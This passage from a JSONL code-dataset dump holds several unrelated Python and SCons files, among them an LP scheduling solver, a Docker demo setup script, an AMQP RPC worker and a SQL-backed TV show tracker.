a['var'] for a in t]) <= m.capacity(time_step, cm),\n f'Max work capaciy for machine {m.id} and time step {time_step}')\n\n # consecutive constraints\n for job in job_list:\n last: Task = None\n for task in job.tasks:\n if last is not None:\n solver.constraint(\n last.solver_assigned_start <= task.solver_assigned_start - 1 - task.free_days_before,\n name=f'Consecutive 1 for task {task.id}')\n if task.directly_after_last:\n assert last is not None\n solver.constraint(\n last.solver_assigned_start_machine_time + 1 == task.solver_assigned_start_machine_time,\n name=f'Consecutive 2 for task {task.id}')\n last = task\n\n # compute delay\n for job in job_list:\n if len(job.tasks) > 0:\n # assert not job.tasks[-1].machine.external\n big_number = 3000\n job.solver_delay = solver.int_var(0, big_number, f'Job {job.id} delay')\n if warm_start:\n solver.set_default_value(job.solver_delay, job.result_delay)\n solver.constraint(job.solver_delay >= 
job.tasks[-1].solver_assigned_start - job.deadline,\n name=f'delay for job {job.id}')\n\n job.solver_has_delay = solver.int_var(0, 1, f'Job {job.id} delay')\n if warm_start:\n solver.set_default_value(job.solver_has_delay, 1 if job.result_delay > 0 else 0)\n solver.constraint(job.solver_has_delay * big_number >= job.solver_delay, f'has delay for job {job.id}')\n else:\n job.solver_has_delay = 0\n job.solver_delay = 0\n\n project_weight = {a['project']: a['jobWeight'] for a in setup['objective']['projects']}\n default_job_weight = setup['objective']['jobWeight']\n solver.minimize(\n sum([(project_weight[job.project] if job.project in project_weight else default_job_weight) *\n setup['objective']['penaltyPerDay'] * job.solver_delay for job in job_list])\n + sum([(project_weight[job.project] if job.project in project_weight else default_job_weight) *\n setup['objective']['oneTimePenalty'] * job.solver_has_delay for job in job_list])\n + obj_dv\n )\n solver.solve(time_limit=setup['timeLimit'])\n\n machine_days = defaultdict(lambda: defaultdict(lambda: 0))\n\n for task in task_list:\n for t, v in task.solver_vars_per_timestep.items():\n if int(solver.value(v)) == 1:\n # task.result_processing_day = t\n machine_days[t][task.machine.id] += task.length\n\n from presolver import perf_measures\n p = perf_measures(job_list)\n p['obj'] = solver.get_objective_value()\n print('Solve objective', solver.get_objective_value())\n p['termination_time'] = time() - start\n p['mip_gap'] = solver.mip_gap\n p['mip_gap_abs'] = solver.mip_gap_abs\n p['num_vars'] = solver.m.getAttr('NumVars')\n p['num_constrs'] = solver.m.getAttr('NumConstrs')\n return dict(machine_days=machine_days, **p)\n","sub_path":"lp_solver.py","file_name":"lp_solver.py","file_ext":"py","file_size_in_byte":6958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"101903077","text":"#file: Coretech/Code/Sloth/STestbedApplication/SConscript\n\n\n###########################################\n# import\n\nimport os\n\nImport( \"env\" )\nenv = env.Clone()\n\n\n###########################################\n# local varaibles\n\ntranslationUnitName = 'STestbedApplication'\ntranslationUnitProjectName = translationUnitName + env['MSVSPROJECTSUFFIX']\ntranslationUnitSolutionName = translationUnitName + env['MSVSSOLUTIONSUFFIX']\n\n#src files \nsourceFileDict = {\n 'DATA' : [\n 'Data/vertex_shader.txt',\n 'Data/vertex_shader_lights.txt',\n ],\n '' : [\n 'STestbedApplication.cpp',\n 'STestbedApplication.h',\n 'SConscript'\n ],\n }\n\n######################################\n#adjust our env\n\nif env.get( 'TARGET_DEBUG', False ):\n env[ 'PDB' ] = translationUnitName + '.pdb'\n\nenv.Append( TARGET_DEFINES = [ '_CONSOLE' ] )\n\n######################################\n#build exe alias( 'build' )\n\nbuild = env.BuildMsvs(\n target = translationUnitName + '.exe',\n source = [ \n translationUnitSolutionName,\n \"${BUILD_DIR}/Code/Lib/Hubris.Lib\",\n \"${BUILD_DIR}/Code/Lib/Pride.Lib\",\n \"${BUILD_DIR}/Code/Lib/Sloth.Lib\",\n \"${BUILD_DIR}/Code/Lib/Lust.Lib\",\n ],\n sourceFile = env.File( '#Code/Sloth/STestbedApplication/' + translationUnitSolutionName ),\n projectName = translationUnitName,\n ) \nenv.Alias( 'build', build )\n\n######################################\n#build project\n\nif 'CreateMsvsProject' in env['TOOLS']:\n project = env.CreateMsvsProject(\n target = translationUnitProjectName,\n source = [\n env.File( '${CODE_DIR}/Sloth/STestbedApplication/Sconscript' ),\n ], \n sourceProjectFiles = 
sourceFileDict,\n additionalIncludeDirectories = [ \"..\\\\..\", ], \n additionalDependencies = [ \n \"Hubris.lib\", \n \"Envy.lib\",\n \"Pride.lib\",\n \"Sloth.lib\",\n \"Lust.lib\",\n \"TinyXml.lib\",\n \"opengl32.lib\",\n ],\n additionalLibraryDirectories = [ \n env.Dir( '${BUILD_DIR}/Code/Lib' ).abspath,\n env.Dir( '${BUILD_DIR}/ThirdParty/Lib' ).abspath,\n ],\n projectType = 'Win32Proj',\n buildWindowApp = True,\n buildBase = os.path.join( \"..\", \"..\", \"..\", env.Dir( '.' ).path ),\n )\n Clean( project, env.File( translationUnitProjectName ).srcnode() )\n env.Default( project )\n\n######################################\n#build solution (default)\n\nif 'CreateMsvsSolution' in env['TOOLS']:\n solution = env.CreateMsvsSolution(\n target = translationUnitSolutionName,\n source = [\n translationUnitProjectName,\n ],\n sourceSolutionDependency = { \n translationUnitProjectName : [\n \"Hubris.vcproj\",\n \"Envy.vcproj\",\n \"Pride.vcproj\",\n \"Lust.vcproj\",\n \"Sloth.vcproj\",\n ],\n \n \"..\\\\..\\\\Hubris\\\\Hubris.vcproj\" : [\n \"TinyXml.vcproj\",\n ],\n \n \"..\\\\..\\\\Envy\\\\Envy.vcproj\" : [\n ],\n \n \"..\\\\..\\\\Pride\\\\Pride.vcproj\" : [\n ],\n\n \"..\\\\..\\\\Lust\\\\Lust.vcproj\" : [\n ],\n\n \"..\\\\Sloth.vcproj\" : [\n ],\n \n \"..\\\\..\\\\..\\\\ThirdParty\\\\TinyXml\\\\TinyXml.vcproj\" : [\n ], \n },\n solutionItemArray = [\n \"SConscript\",\n \"..\\\\..\\\\..\\\\SolutionItems\\\\code_standard.txt\", \n \"..\\\\..\\\\..\\\\SolutionItems\\\\todo.txt\", \n \"..\\\\..\\\\..\\\\SolutionItems\\\\plan.txt\", \n \"..\\\\..\\\\..\\\\SolutionItems\\\\glsl_vertex_shader_quick_ref.txt\", \n ],\n\n )\n env.Clean( solution, env.File( translationUnitSolutionName ).srcnode() ) \n env.Default( solution )\n \n#end file","sub_path":"Sloth/STestbedApplication/SConscript","file_name":"SConscript","file_ext":"","file_size_in_byte":3508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"137651821","text":"import pymongo\nfrom pymongo import MongoClient\nimport string\nimport random\nimport sys\n\n#connect to the mongod service\nclient = MongoClient('mongodb://localhost:27017')\n#switch to the database containing sensor data\ndb = client[\"sensors\"]\n\ncity = raw_input(\"city: \") #add in the city of the new sensor\nstate = raw_input(\"2 letter state abbreviation: \") #and its city\nstate = state.upper() #make sure the state is upper case\n\ncolls = db.collection_names(include_system_collections=False)\n\nsensorDict = {\"sen\" + str(len(colls)+1): (city, state)} #make dictionary entry for new sensor\n\nfor key, value in sensorDict.iteritems(): #go through all updates\n\tcollect = db[key] #make new collection for the new sensor coming online\n\tprint(collect.count()) #see if the collecion previously existed (doesn't create duplicate if it does)\n\tif collect.count() == 0:\n\t\tpost = {\"location\": key,\n\t\t\t\t\"city\": value[0],\n\t\t\t\t\"state\": value[1]}\n\t\tcollect.insert_one(post) #insert the locatoin document","sub_path":"server/addDevice.py","file_name":"addDevice.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"48308010","text":"import sys\nimport urllib\nimport json\nimport argparse\nimport urllib.request\nimport csv\nimport os\nimport yaml\nimport glob\nfrom PIL import Image\n\nwith open('../docs/iiif/amami/manifest.json') as f:\n df = json.load(f)\n\ncanvases = df[\"sequences\"][0][\"canvases\"]\n\nmembers = []\n\nfor i 
in range(len(canvases)):\n    canvas_id = canvases[i][\"@id\"]\n    ys = [[1600, 2400, 3150, 3200 + 800], [4500, 5250, 6000, 6000 + 800]]\n    \n    if i % 2 == 0:\n        xs = [770, 2700, 2700 + 1900]\n    \n    else:\n        xs = [1000, 2800, 2800 + 1900]\n\n    r = 2400 / 5457\n\n    for y in ys:\n\n        for j in range(0, len(xs) - 1):\n            x1 = xs[len(xs) - j - 2]\n            x2 = xs[len(xs) - j - 1]\n            w = x2 - x1\n\n            for k in range(len(y) - 1):\n                y1 = y[k]\n                y2 = y[k + 1]\n                h = y2 - y1\n\n                member_id = canvas_id+\"#xywh=\"+str(int(x1 * r))+\",\"+str(int(y1 * r))+\",\"+str(int(w*r))+\",\"+str(int(h*r))\n                members.append({\n                    \"@id\": member_id,\n                    \"@type\": \"sc:Canvas\",\n                    \"label\": \"[\"+str(i+1)+\"]\",\n                    \"description\": \"\"\n                })\n\ncuration = {\n    \"@context\": [\n        \"http://iiif.io/api/presentation/2/context.json\",\n        \"http://codh.rois.ac.jp/iiif/curation/1/context.json\"\n    ],\n    \"@type\": \"cr:Curation\",\n    \"@id\": \"https://mp.ex.nii.ac.jp/api/curation/json/aaa5d585-3cd2-4651-ba98-71769b028e19\",\n    \"label\": \"Curating list\",\n    \"selections\": [\n        {\n            \"@id\": \"https://mp.ex.nii.ac.jp/api/curation/json/aaa5d585-3cd2-4651-ba98-71769b028e19/range1\",\n            \"@type\": \"sc:Range\",\n            \"label\": \"Manual curation by IIIF Curation Viewer\",\n            \"members\": members,\n            \"within\": {\n                \"@id\": \"https://raw.githubusercontent.com/nakamura196/amami/master/docs/iiif/amami/manifest.json\",\n                \"@type\": \"sc:Manifest\",\n                \"label\": \"奄美大島\"\n            }\n        }\n    ]\n}\n\nfw = open(\"../docs/curation/block.json\", 'w')\njson.dump(curation, fw, ensure_ascii=False, indent=4, sort_keys=True, separators=(',', ': '))\n","sub_path":"src/createCuration.py","file_name":"createCuration.py","file_ext":"py","file_size_in_byte":2055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
+{"seq_id":"273610010","text":"__author__ = 'cissnei'\n\nimport tensorflow as tf\n\nnode1 = tf.constant(3.0, tf.float32)\nnode2 = tf.constant(4.0, tf.float32)\nnode3 = tf.add(node1, node2)\n\nprint(\"node1: \", node1) # it prints just the structure of the tensor, not its value\n\nsess=tf.Session()\nprint(sess.run([node1, node2]))\nprint(sess.run(node3))\n\n#Placeholder\n\na = tf.placeholder(tf.float32)\nb = tf.placeholder(tf.float32)\nadder_node = a + b # same as 'add(a,b)'\n\nprint (sess.run(adder_node, feed_dict ={a:3.0, b: 4.5}))\nprint (sess.run(adder_node, feed_dict={a:[1,3], b:[2,5]}))\n\n\n","sub_path":"ComputationalGraph.py","file_name":"ComputationalGraph.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
+{"seq_id":"604823464","text":"#!/usr/bin/env python\n# Exit 1 if any wheel or sdist has a bad version\nimport sys\nfrom pathlib import Path\n\nPACKAGE_NAME = \"scikit_misc\"\nNULL_VERSION = \"0.0.0\"\nBAD_PFX = f\"{PACKAGE_NAME}-{NULL_VERSION}\"\n\nWHEELS = Path(\"wheelhouse/\").glob(\"*.whl\")\nDISTS = Path(\"dist/\").glob(\"*.tar.gz\")\n\n\ndef wheels_have_good_version() -> bool:\n    \"\"\"\n    Return True if no wheel has a null version\n    \"\"\"\n    return all(not s.name.startswith(BAD_PFX) for s in WHEELS)\n\n\ndef sdists_have_good_version() -> bool:\n    \"\"\"\n    Return True if no sdist has a null version\n    \"\"\"\n    return all(not s.name.startswith(BAD_PFX) for s in DISTS)\n\n\ndef have_good_versions() -> bool:\n    \"\"\"\n    Return True if no wheel or sdist has a null version\n\n    A null version is \"0.0.0\"\n    \"\"\"\n    return wheels_have_good_version() and sdists_have_good_version()\n\n\nif __name__ == \"__main__\":\n    if not have_good_versions():\n        
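# a 0.0.0 placeholder version means the real version was never injected during the build, so fail\n        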
sys.exit(1)\n","sub_path":".github/utils/check_package_version.py","file_name":"check_package_version.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"608237165","text":"\"\"\"\n// Source: https://leetcode.com/problems/delete-node-in-a-linked-list/\n// Author: Nan Wei\n// Date: 2019-04-03\n\n/* Write a function to delete a node (except the tail) in a singly linked list, given only access to that node.\n *\n * Given linked list -- head = [4,5,1,9]\n * Example 1:\n * Input: head = [4,5,1,9], node = 5\n * Output: [4,1,9]\n * Explanation: You are given the second node with value 5, the linked list should become 4 -> 1 -> 9 after calling your function.\n \n * Example 2:\n * Input: head = [4,5,1,9], node = 1\n * Output: [4,5,9]\n * Explanation: You are given the third node with value 1, the linked list should become 4 -> 5 -> 9 after calling your function.\n \n\n * Note:\n * The linked list will have at least two elements.\n * All of the nodes' values will be unique.\n * The given node will not be the tail and it will always be a valid node of the linked list.\n * Do not return anything from your function\n\n/* Idea: change the value in the current node to the same as the next node, then modify the link to point to the node after the next link (next of the next)\n */\n\"\"\"\n\nclass Solution:\n def deleteNode(self, node):\n node.val = node.next.val\n node.next = node.next.next\n\n# Dumber idea that I had initially - copy the values forward until the second last node, at which point we change its next to None in order to shorten the link length by 1\nclass Solution:\n def deleteNode(self, node):\n \"\"\"\n :type node: ListNode\n :rtype: void Do not return anything, modify node in-place instead.\n \"\"\"\n while node.next.next:\n node.val = node.next.val\n node = node.next\n node.val = node.next.val\n node.next = None\n","sub_path":"237_delete_node_in_a_linked_list/python.py","file_name":"python.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"62427645","text":"#!/usr/bin/env python\n\nimport os\nfrom environment import common, docker\n\n# ===== input =======\nsl_builder_image = 'onedata/sl_builder:v2'\nbuilder_image = 'onedata/builder'\n\nconfig_dir = '/home/lichon/IdeaProjects/oneprovider/dev_scripts/cfg'\n\nglobalregistry_pkg_dir = '/home/lichon/IdeaProjects/globalregistry/rel'\nglobalregistry_pkg_name = 'globalregistry-Linux.x86_64.rpm'\n\nprovider_pkg_dir = '/home/lichon/IdeaProjects/oneprovider/releases'\nprovider_pkg_name = 'oneprovider_2.5.0.53.deb'\n# ===================\n\ndns, dns_output = common.set_up_dns('auto', 'onedata')\ngr_name = 'gr_onedata'\ngr = docker.run(\n image=sl_builder_image,\n hostname='gr.onedata.dev.docker',\n detach=True,\n interactive=True,\n tty=True,\n workdir='/root',\n name=gr_name,\n volumes=[(globalregistry_pkg_dir, '/root/pkg', 'ro'),\n (config_dir, '/root/cfg', 'ro')],\n dns_list=dns,\n run_params=['--privileged=true'],\n command='yum install -y pkg/' + globalregistry_pkg_name + ' && sleep 5 && onepanel_admin --install /root/cfg/gr.cfg ; bash')\n\nprovider1 = docker.run(\n image=builder_image,\n hostname='provider1.onedata.dev.docker',\n detach=True,\n interactive=True,\n tty=True,\n workdir='/root',\n name='provider1_onedata',\n volumes=[(provider_pkg_dir, '/root/pkg', 'ro'),\n (config_dir, '/root/cfg', 'ro')],\n dns_list=dns,\n link={gr_name: 
'onedata.org'},\n run_params=['--privileged=true'],\n command='dpkg -i pkg/' + provider_pkg_name + ''' || apt-get -y install -f\nsed -i \\\"s/{239, 255, 0, 1}/{238, 255, 0, 1}/g\\\" /opt/oneprovider/nodes/onepanel/etc/app.config\napt-get -y install libnspr4-dev\nsleep 5\nonepanel_admin --install /root/cfg/prov1.cfg\nbash''')\n\nprovider2 = docker.run(\n image=builder_image,\n hostname='provider2.onedata.dev.docker',\n detach=True,\n interactive=True,\n tty=True,\n workdir='/root',\n name='provider2_onedata',\n volumes=[(provider_pkg_dir, '/root/pkg', 'ro'),\n (config_dir, '/root/cfg', 'ro')],\n dns_list=dns,\n link={gr_name: 'onedata.org'},\n run_params=['--privileged=true'],\n command='dpkg -i pkg/' + provider_pkg_name + ''' || apt-get -y install -f\napt-get -y install libnspr4-dev\nsleep 5\nonepanel_admin --install /root/cfg/prov2.cfg\nbash''')\n\n# Replace onedata.org, provider1.onedata.dev.docker, provider2.onedata.dev.docker routing in /etc/hosts\nos.system(\"sed -i \\\"s/.*onedata.org$/`docker inspect --format '{{ .NetworkSettings.IPAddress }}' gr_onedata`\\tonedata.org/g\\\" /etc/hosts\")\nos.system(\"sed -i \\\"s/.*provider1.onedata.dev.docker$/`docker inspect --format '{{ .NetworkSettings.IPAddress }}' provider1_onedata`\\tprovider1.onedata.dev.docker/g\\\" /etc/hosts\")\nos.system(\"sed -i \\\"s/.*provider2.onedata.dev.docker$/`docker inspect --format '{{ .NetworkSettings.IPAddress }}' provider2_onedata`\\tprovider2.onedata.dev.docker/g\\\" /etc/hosts\")\n\nprint([gr, provider1, provider2])","sub_path":"bamboos/docker/demo_up.py","file_name":"demo_up.py","file_ext":"py","file_size_in_byte":2913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"124145494","text":"#!/usr/bin/env python3\nimport AmqpConnector\nimport msgpack\nimport logging\nimport os.path\nimport threading\nimport ssl\nimport time\nimport traceback\n\nRUN_STATE = True\n\nclass RpcHandler(object):\n\tdie = False\n\n\tdef __init__(self, settings):\n\n\t\tthName = threading.current_thread().name\n\t\tif \"-\" in thName:\n\t\t\tlogPath = \"Main.Thread-{num}.RPC\".format(num=thName.split(\"-\")[-1])\n\t\telse:\n\t\t\tlogPath = 'Main.RPC'\n\n\t\tself.log = logging.getLogger(logPath)\n\t\tself.log.info(\"RPC Management class instantiated.\")\n\n\t\tself.settings = settings\n\n\t\t# Require clientID in settings\n\t\tassert 'clientid' in settings\n\t\tassert \"RABBIT_LOGIN\" in settings\n\t\tassert \"RABBIT_PASWD\" in settings\n\t\tassert \"RABBIT_SRVER\" in settings\n\t\tassert \"RABBIT_VHOST\" in settings\n\n\t\tif not self.settings:\n\t\t\traise ValueError(\"The 'settings.json' file was not found!\")\n\n\t\tself.cert = self.findCert()\n\n\n\n\tdef findCert(self):\n\t\t'''\n\t\tVerify the SSL cert exists in the proper place.\n\t\t'''\n\t\tcurFile = os.path.abspath(__file__)\n\n\t\tcurDir = os.path.split(curFile)[0]\n\t\tcertPath = os.path.join(curDir, './deps/cacert.pem')\n\n\t\tassert os.path.exists(certPath)\n\n\t\treturn certPath\n\n\n\n\tdef process(self, body):\n\t\traise ValueError(\"This must be subclassed!\")\n\n\n\tdef _process(self, body):\n\t\t# body = json.loads(body)\n\t\tbody = msgpack.unpackb(body, use_list=True, encoding='utf-8')\n\n\t\tassert isinstance(body, dict) == True, 'The message must decode to a dict!'\n\n\t\tdelay = None\n\n\t\ttry:\n\t\t\tif 'postDelay' in body:\n\t\t\t\tdelay = int(body['postDelay'])\n\n\t\t\tself.log.info(\"Received request. 
Processing.\")\n\t\t\tret = self.process(body)\n\n\t\t\tassert isinstance(ret, dict) == True, '`process()` call in child-class must return a dict!'\n\n\t\t\t# Copy the jobid and dbid across, so we can cross-reference the job\n\t\t\t# when it's received.\n\t\t\tif 'jobid' in body:\n\t\t\t\tret['jobid'] = body['jobid']\n\n\t\t\tif not 'success' in ret:\n\t\t\t\tret['success'] = True\n\t\t\tif not 'cancontinue' in ret:\n\t\t\t\tret['cancontinue'] = True\n\n\n\t\t\tself.log.info(\"Processing complete. Submitting job with id '%s'.\", ret['jobid'])\n\t\texcept Exception:\n\t\t\tret = {\n\t\t\t\t'success' : False,\n\t\t\t\t'error' : \"unknown\",\n\t\t\t\t'traceback' : traceback.format_exc(),\n\t\t\t\t'cancontinue' : True\n\t\t\t}\n\t\t\tif 'jobid' in body:\n\t\t\t\tret['jobid'] = body['jobid']\n\n\t\t\tself.log.error(\"Had exception?\")\n\t\t\tfor line in traceback.format_exc().split(\"\\n\"):\n\t\t\t\tself.log.error(line)\n\n\n\t\t\t# Disable the delay if the call had an exception.\n\t\t\tdelay = 0\n\n\t\tif not 'cancontinue' in ret:\n\t\t\tself.log.error('Invalid return value from `process()`')\n\t\telif not ret['cancontinue']:\n\t\t\tself.log.error('Uncaught error in `process()`. Exiting.')\n\t\t\tself.die = True\n\n\n\t\tret['user'] = self.settings['clientid']\n\n\t\tself.log.info(\"Returning\")\n\n\t\treturn msgpack.packb(ret, use_bin_type=True), delay\n\t\t# return json.dumps(ret), delay\n\n\tdef successDelay(self, sleeptime):\n\t\t'''\n\t\tDelay for `sleeptime` seconds, but output a \"Oh hai, I'm sleeping\" message\n\t\tevery 15 seconds while doing so.\n\t\tAlso, return immediately if told to exit.\n\t\t'''\n\t\tif sleeptime and not self.die and RUN_STATE:\n\n\t\t\tself.log.info(\"Sleeping %s seconds.\", sleeptime)\n\n\t\t\tfor x in range(sleeptime):\n\t\t\t\ttime.sleep(1)\n\t\t\t\tif (sleeptime - x) % 15 == 0:\n\t\t\t\t\tself.log.info(\"Sleeping %s more seconds....\", sleeptime - x)\n\t\t\t\tif not RUN_STATE:\n\t\t\t\t\tself.log.info( \"Breaking due to exit flag being set\")\n\t\t\t\t\tbreak\n\n\n\n\tdef processEvents(self):\n\t\t'''\n\t\tConnect to the server, wait for a task, and then disconnect untill another job is\n\t\treceived.\n\n\t\tThe AMQP connection is not maintained due to issues with long-lived connections.\n\n\t\t'''\n\n\t\tif self.cert:\n\t\t\tsslopts = {\"cert_reqs\" : ssl.CERT_REQUIRED, \"ca_certs\" : self.cert}\n\t\telse:\n\t\t\tsslopts = None\n\n\t\tshutdownType = \"dirty\"\n\n\t\ttry:\n\t\t\twhile RUN_STATE and not self.die:\n\t\t\t\ttry:\n\t\t\t\t\tconnector = AmqpConnector.Connector(userid = self.settings[\"RABBIT_LOGIN\"],\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tpassword = self.settings[\"RABBIT_PASWD\"],\n\t\t\t\t\t\t\t\t\t\t\t\t\t\thost = self.settings[\"RABBIT_SRVER\"],\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tvirtual_host = self.settings[\"RABBIT_VHOST\"],\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tssl = sslopts,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tsession_fetch_limit = 1,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tdurable = True,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t)\n\t\t\t\texcept IOError:\n\t\t\t\t\tself.log.error(\"Error while connecting to server.\")\n\t\t\t\t\tself.log.error(\"Is the AMQP server not available?\")\n\t\t\t\t\tfor line in traceback.format_exc().split(\"\\n\"):\n\t\t\t\t\t\tself.log.error(line)\n\t\t\t\t\tself.log.error(\"Trying again in 30 seconds.\")\n\t\t\t\t\ttime.sleep(30)\n\t\t\t\t\tcontinue\n\n\t\t\t\tself.log.info(\"Connection Established. 
Awaiting RPC requests\")\n\n\n\t\t\t\twhile RUN_STATE and not self.die:\n\t\t\t\t\tmessage = connector.getMessage()\n\t\t\t\t\tif message:\n\t\t\t\t\t\tself.log.info(\"Processing message.\")\n\n\t\t\t\t\t\tresponse, postDelay = self._process(message)\n\n\t\t\t\t\t\tself.log.info(\"Response message size: %0.3fK. Sending\", int(len(response)/1024))\n\t\t\t\t\t\tconnector.putMessage(response)\n\t\t\t\t\t\tbreak\n\n\t\t\t\t\ttime.sleep(0.1)\n\n\t\t\t\tself.log.info(\"Closing RPC queue connection.\")\n\t\t\t\tconnector.stop()\n\n\n\t\t\t\tself.successDelay(postDelay)\n\n\n\t\texcept KeyboardInterrupt:\n\t\t\tself.log.info(\"Keyboard Interrupt exit!\")\n\t\t\tself.die = True\n\n\n\t\tself.log.info(\"Halting message consumer.\")\n\t\ttry:\n\t\t\tconnector.stop()\n\t\texcept Exception:\n\t\t\tself.log.error(\"Closing the connector produced an error!\")\n\t\t\tfor line in traceback.format_exc().split(\"\\n\"):\n\t\t\t\tself.log.error(line)\n\n\n\t\tself.log.info(\"Closed. Exiting\")\n\n\t\tif not RUN_STATE or self.die:\n\t\t\traise KeyboardInterrupt\n","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":5434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"430835709","text":"#!/usr/bin/env python3\n\nimport os\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import scoped_session, sessionmaker\nfrom sqlalchemy.ext.declarative import declarative_base\nimport datetime\n\n#from app import db, app\n\n\n#engine = create_engine('postgresql://postgres:8008@localhost/EpPicker')\nengine = create_engine(os.environ.get('DATABASE_URL'))\ndb = scoped_session(sessionmaker(bind=engine))\n\ndef get_new_user():\n print(\"begin get_new_user()\")\n row = db.execute(\"SELECT * FROM run ORDER BY cookie desc LIMIT 1\").fetchone()\n if not row:\n big_cookie = 0\n\n else:\n big_cookie = row.cookie\n\n print(big_cookie)\n\n return big_cookie + 1\n\ndef get_show_id(link):\n\n row = db.execute(\"SELECT id FROM show WHERE link= :link\",\n {\"link\": link}).fetchone()\n\n return row[\"show_id\"]\n\ndef update_shows(show):\n print(\"begin update_shows()\")\n print(\"show: \")\n print(show)\n\n #check if show for show already exists\n row = db.execute(\"SELECT * FROM show WHERE link= :link\",\n {\"link\": show[\"link\"]}).fetchone()\n\n #if so, increment the number of shows\n if row != None:\n print(\"row: \")\n print(row)\n\n #update\n db.execute(\n \"UPDATE show SET searches = :next WHERE id = :id\",\n {\"next\": row[\"searches\"] + 1, \"id\": row[\"id\"]}\n )\n\n ret = row[\"id\"]\n print(ret)\n\n #else, add as show\n else:\n\n db.execute(\n \"INSERT INTO show (title, link, image, searches) VALUES (:title, :link, :image, :searches)\",\n {\"title\": show[\"title\"], \"link\": show[\"link\"], \"image\": show[\"image\"], \"searches\": \"1\"}\n )\n\n new = db.execute(\"SELECT * FROM show WHERE link= :link\",\n {\"link\": show[\"link\"]}).fetchone()\n ret = new[\"id\"]\n\n db.commit()\n\n\n\n return ret\n\ndef update_runs(run):\n\n print('begin update_runs()')\n print(run[\"user\"])\n print(type(run[\"user\"]))\n\n #check if run for show exists with matching user\n row = db.execute(\"SELECT * FROM run WHERE show_id= :show_id AND cookie= :cookie\",\n {\"show_id\": run[\"show_id\"], \"cookie\": str(run[\"user\"])}).fetchone()\n\n #if so, update seasons and rating factor\n if row != None:\n\n db.execute(\n \"UPDATE run SET seasons = :seasons, active=:active, rating_factor = :rating_factor, time_stamp = :time_stamp WHERE id = :id\",\n 
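# Added note: the :name placeholders in the SQL string above are bound from the\n            # mapping passed as the next argument (SQLAlchemy text-style parameters).\n            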
{\"seasons\" : run[\"seasons\"], \"active\": run[\"active\"], \"rating_factor\": run[\"rating_factor\"], \"time_stamp\": datetime.datetime.now(), \"id\": row.id}\n )\n\n\n #else, add run\n else:\n #update\n db.execute(\n \"INSERT INTO run (cookie, show_id, seasons, active, rating_factor, time_stamp) VALUES (:cookie, :show_id, :seasons, :active, :rating_factor, :time_stamp)\",\n {\"cookie\": run[\"user\"], \"show_id\": run[\"show_id\"], \"seasons\": run[\"seasons\"], \"active\": run[\"active\"], \"rating_factor\": run[\"rating_factor\"], \"time_stamp\": datetime.datetime.now()}\n )\n\n\n db.commit()\n\ndef unpack_show(row):\n\n return ({\n \"title\": row.title,\"link\": row.link,\"image\": row.image\n })\n\ndef unpack_seasons(seasons):\n\n format_seasons = seasons[1:-1].split(',')\n\n return list(map(int, format_seasons))\n\n\ndef get_shows():\n\n shows = []\n rows = db.execute(\"SELECT * FROM show ORDER BY searches desc LIMIT 10\").fetchall()\n\n for row in rows:\n\n shows.append(unpack_show(row))\n\n return shows\n\ndef get_runs(user):\n print(\"begin get_runs()\")\n print(\"user: \" + user)\n\n runs = []\n rows = db.execute(\"SELECT * FROM run WHERE cookie=:cookie ORDER BY time_stamp desc LIMIT 10\",\n {\"cookie\": user}).fetchall()\n\n print(len(rows))\n\n for row in rows:\n\n print(row)\n\n show = db.execute(\"SELECT * FROM show WHERE id= :id\",\n {\"id\": row.show_id}).fetchone()\n\n print(show)\n\n unpacked_show = unpack_show(show)\n unpacked_show[\"seasons\"] = unpack_seasons(row.seasons)\n unpacked_show[\"active\"] = unpack_seasons(row.active)\n unpacked_show[\"rating_factor\"] = row.rating_factor\n\n runs.append(unpacked_show)\n\n return runs\n","sub_path":"database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":4151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"267815798","text":"from core.managers import BaseManager\nfrom modules.apps.managers import AppConfigManager, AppManager\nimport os\n\n\nclass EnvironmentManager(BaseManager):\n def __init__(self, config_manager, env_name='default'):\n if not isinstance(config_manager, AppConfigManager):\n raise TypeError('Config manager should be an instance of AppConfigManager.')\n\n self.config_manager = config_manager\n self.app = config_manager.app # App instance\n self.env_name = env_name\n\n if 'env' not in config_manager.config.keys():\n config_manager.config['env'] = dict()\n\n self.env = config_manager.config['env']\n if 'default' not in self.env.keys():\n # Make sure default environment always exists\n self.env['default'] = dict()\n\n super().__init__()\n\n def should_exist(self):\n # Expect an environment to exist\n if self.env_name not in self.env.keys():\n self.logger.fail('Environment \"{}\" does not exist.'.format(self.env_name))\n\n def should_not_exist(self):\n # Expect an environment not to exist\n if self.env_name in self.env.keys():\n self.logger.fail('Environment \"{}\" already exists.'.format(self.env_name))\n\n def create(self):\n # Create an environment\n self.should_not_exist()\n\n self.env[self.env_name] = dict()\n self.config_manager.save()\n\n self.logger.info('Environment \"{}\" created.'.format(self.env_name))\n\n def delete(self):\n # Delete an environment\n self.should_exist()\n\n del self.env[self.env_name]\n self.config_manager.save()\n\n self.logger.info('Environment \"{}\" deleted.'.format(self.env_name))\n\n def set(self, **kwargs):\n # Set environment variable(s)\n self.should_exist()\n\n for env_key, env_value in 
